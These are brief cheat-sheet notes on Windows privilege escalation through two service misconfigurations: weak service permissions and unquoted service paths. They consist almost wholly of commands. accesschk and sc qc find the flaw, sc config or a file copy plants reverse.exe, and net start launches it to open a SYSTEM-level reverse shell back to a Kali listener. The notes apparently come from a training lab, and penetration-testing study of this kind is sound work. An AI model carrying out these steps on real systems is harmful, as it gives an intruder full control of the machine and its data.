Final Draft 1
Tr3bius's Windows Privilege Escalation
Service Exploits - Insecure Service Permissions
C:\PrivEsc\accesschk.exe /accepteula -uwcqv user daclsvc
#Note that the "user" account has the permission to change the service config (SERVICE_CHANGE_CONFIG).
#Query the service and note that it runs with SYSTEM privileges (SERVICE_START_NAME):
sc qc daclsvc
#Modify the service config and set the BINARY_PATH_NAME (binpath) to the reverse.exe executable you created:
sc config daclsvc binpath= "\"C:\PrivEsc\reverse.exe\""
#Start a listener on Kali and then start the service to spawn a reverse shell running with SYSTEM privileges:
net start daclsvcService Exploits - Unquoted Service Path
USE WinPEAS / Powerup to check for unqouted service path
#Query the "unquotedsvc" service and note that it runs with SYSTEM privileges (SERVICE_START_NAME) and that the BINARY_PATH_NAME is unquoted and contains spaces.
sc qc unquotedsvc
#Using accesschk.exe, note that the BUILTIN\Users group is allowed to write to the C:\Program Files\Unquoted Path Service\ directory:
C:\PrivEsc\accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"
#Copy the reverse.exe executable you created to this directory and rename it Common.exe:
copy C:\PrivEsc\reverse.exe "C:\Program Files\Unquoted Path Service\Common.exe"
#Start a listener on Kali and then start the service to spawn a reverse shell running with SYSTEM privileges:
net start unquotedsvcLast updated